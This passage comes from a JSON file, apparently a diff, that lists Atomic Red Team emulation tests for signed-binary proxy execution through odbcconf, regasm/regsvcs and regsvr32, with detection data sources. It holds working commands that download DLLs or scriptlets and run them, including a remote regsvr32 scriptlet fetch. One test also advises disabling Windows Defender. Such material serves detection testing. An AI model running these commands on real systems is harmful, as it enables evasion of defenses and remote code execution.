"PathToAtomicsFolder\\T1218.008\\src\\Win32\\T1218-2.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1218-2.dll must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "odbcconf.exe /S /A {REGSVR \"#{dll_payload}\"}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": 
"process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1218.009", + "command_list": [ + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"%tmp%\\T1218.009.dll\" /target:library #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U %tmp%\\T1218.009.dll\n", + "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", + "$key = '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'\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"$Env:TEMP\\T1218.009.dll\" /target:library /keyfile:$env:Temp\\key.snk #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe $Env:TEMP\\T1218.009.dll\n", + "$key = 
'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library /keyfile:$env:Temp\\key.snk PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe #{output_file}\n" + ], + "commands": [ + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"%tmp%\\T1218.009.dll\" /target:library #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U %tmp%\\T1218.009.dll\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvcs/Regasm" + }, + { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed 
Binary Proxy Execution: Regsvcs/Regasm" + }, + { + "command": "$key = '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'\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"$Env:TEMP\\T1218.009.dll\" /target:library /keyfile:$env:Temp\\key.snk #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe $Env:TEMP\\T1218.009.dll\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvcs/Regasm" + }, + { + "command": "$key = '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'\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library /keyfile:$env:Temp\\key.snk PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe #{output_file}\n", + "source": "atomics/T1218.009/T1218.009.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvcs/Regasm" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.009", + "display_name": "Signed Binary Proxy Execution: Regsvcs/Regasm", + "atomic_tests": [ + { + "name": "Regasm Uninstall Method Call Test", + "auto_generated_guid": "71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112", + "description": "Executes the Uninstall Method, No Admin Rights Required. 
Upon execution, \"I shouldn't really execute either.\" will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location of the payload", + "type": "Path", + "default": "%tmp%\\T1218.009.dll" + }, + "source_file": { + "description": "Location of the CSharp source_file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The CSharp source file must exist on disk at specified location (#{source_file})\n", + "prereq_command": "if (Test-Path #{source_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U #{output_file}\n", + "cleanup_command": "del #{output_file} >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvcs Uninstall Method Call Test", + "auto_generated_guid": "fd3c1c6a-02d2-4b72-82d9-71c527abb126", + "description": "Executes the Uninstall Method, No Admin Rights Required, Requires SNK. 
Upon execution, \"I shouldn't really execute\" will be displayed\nalong with other information about the assembly being installed.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Location of the payload", + "type": "Path", + "default": "$Env:TEMP\\T1218.009.dll" + }, + "source_file": { + "description": "Location of the CSharp source_file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.009\\src\\T1218.009.cs" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "The CSharp source file must exist on disk at specified location (#{source_file})\n", + "prereq_command": "if (Test-Path #{source_file}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs\" -OutFile \"#{source_file}\"\n" + } + ], + "executor": { + "command": "$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='\n$Content = [System.Convert]::FromBase64String($key)\nSet-Content $env:Temp\\key.snk -Value $Content -Encoding 
Byte\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /out:\"#{output_file}\" /target:library /keyfile:$env:Temp\\key.snk #{source_file}\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe #{output_file}\n", + "cleanup_command": "Remove-Item #{output_file} -ErrorAction Ignore | Out-Null\n$parentpath = Split-Path -Path \"#{output_file}\"\nRemove-Item $parentpath\\key.snk -ErrorAction Ignore | Out-Null\nRemove-Item $parentpath\\T1218.009.tlb -ErrorAction Ignore | Out-Null\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": 
"command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1218.010", + "command_list": [ + "#{regsvr32path}\\#{regsvr32name} /s /u /i:PathToAtomicsFolder\\T1218.010\\src\\RegSvr32.sct scrobj.dll\n", + "C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#(unknown) scrobj.dll\n", + "#{regsvr32path}\\regsvr32.exe /s /u /i:#(unknown) scrobj.dll\n", + "#{regsvr32path}\\#{regsvr32name} /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll\n", + "C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n", + "#{regsvr32path}\\regsvr32.exe /s /u /i:#{url} scrobj.dll\n", + "IF 
\"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll) ELSE ( #{regsvr32path}\\#{regsvr32name} /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll )\n", + "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( C:\\Windows\\system32\\#{regsvr32name} /s #{dll_name} )\n", + "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\\regsvr32.exe /s #{dll_name} )\n", + "#{regsvr32path}\\#{regsvr32name} /s %temp%\\shell32.jpg\n", + "C:\\Windows\\system32\\#{regsvr32name} /s #{dll_file}\n", + "#{regsvr32path}\\regsvr32.exe /s #{dll_file}\n", + "#{regsvr32path}\\#{regsvr32name} /s /i PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll", + "C:\\Windows\\system32\\#{regsvr32name} /s /i #{dll_name}", + "#{regsvr32path}\\regsvr32.exe /s /i #{dll_name}" + ], + "commands": [ + { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:PathToAtomicsFolder\\T1218.010\\src\\RegSvr32.sct scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#(unknown) scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s /u /i:#(unknown) scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": 
"C:\\Windows\\system32\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s /u /i:#{url} scrobj.dll\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll) ELSE ( #{regsvr32path}\\#{regsvr32name} /s PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll )\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( C:\\Windows\\system32\\#{regsvr32name} /s #{dll_name} )\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\\regsvr32.exe /s #{dll_name} )\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\#{regsvr32name} /s %temp%\\shell32.jpg\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "C:\\Windows\\system32\\#{regsvr32name} /s #{dll_file}\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s #{dll_file}\n", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: 
Regsvr32" + }, + { + "command": "#{regsvr32path}\\#{regsvr32name} /s /i PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "C:\\Windows\\system32\\#{regsvr32name} /s /i #{dll_name}", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + }, + { + "command": "#{regsvr32path}\\regsvr32.exe /s /i #{dll_name}", + "source": "atomics/T1218.010/T1218.010.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Regsvr32" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.010", + "display_name": "Signed Binary Proxy Execution: Regsvr32", + "atomic_tests": [ + { + "name": "Regsvr32 local COM scriptlet execution", + "auto_generated_guid": "449aa403-6aba-47ce-8a37-247d21ef0306", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. 
Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "filename": { + "description": "Name of the local file, include path.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.010\\src\\RegSvr32.sct" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Regsvr32.sct must exist on disk at specified location (#(unknown))\n", + "prereq_command": "if (Test-Path #(unknown)) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct\" -OutFile \"#(unknown)\"\n" + } + ], + "executor": { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:#(unknown) scrobj.dll\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvr32 remote COM scriptlet execution", + "auto_generated_guid": "c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable\nwindows defender real-time protection to fix it. 
Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "url": { + "description": "URL to hosted sct file", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "executor": { + "command": "#{regsvr32path}\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvr32 local DLL execution", + "auto_generated_guid": "08ffca73-9a3d-471a-aeb0-68b4aa3ab37b", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_name": { + "description": "Name of DLL to Execute, DLL Should export DllRegisterServer", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})\n", + "prereq_command": "if (Test-Path #{dll_name}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"\n" + } + ], + "executor": { + 
"command": "IF \"%PROCESSOR_ARCHITECTURE%\"==\"AMD64\" (C:\\Windows\\syswow64\\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\\#{regsvr32name} /s #{dll_name} )\n", + "name": "command_prompt" + } + }, + { + "name": "Regsvr32 Registering Non DLL", + "auto_generated_guid": "1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421", + "description": "Replicating observed Gozi maldoc behavior registering a dll with an altered extension\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_file": { + "description": "Path to renamed dll file to be registered", + "type": "Path", + "default": "%temp%\\shell32.jpg" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "Path", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Test requires a renamed dll file\n", + "prereq_command": "if exist #{dll_file} ( exit 0 ) else ( exit 1 )\n", + "get_prereq_command": "copy \"C:\\Windows\\System32\\shell32.dll\" \"#{dll_file}\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n", + "cleanup_command": "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n" + } + }, + { + "name": "Regsvr32 Silent DLL Install Call DllRegisterServer", + "auto_generated_guid": "9d71c492-ea2e-4c08-af16-c6994cdf029f", + "description": "Regsvr32.exe is a command-line program used to register and unregister OLE controls. 
Normally, an install is executed with /n to prevent calling DllRegisterServer.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_name": { + "description": "Name of DLL to Install", + "type": "String", + "default": "PathToAtomicsFolder\\T1218.010\\bin\\AllTheThingsx86.dll" + }, + "regsvr32path": { + "description": "Default location of Regsvr32.exe", + "type": "String", + "default": "C:\\Windows\\system32" + }, + "regsvr32name": { + "description": "Default name of Regsvr32.exe", + "type": "String", + "default": "regsvr32.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})", + "prereq_command": "if (Test-Path #{dll_name}) {exit 0} else {exit 1}", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll\" -OutFile \"#{dll_name}\"" + } + ], + "executor": { + "command": "#{regsvr32path}\\#{regsvr32name} /s /i #{dll_name}", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A 
process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ 
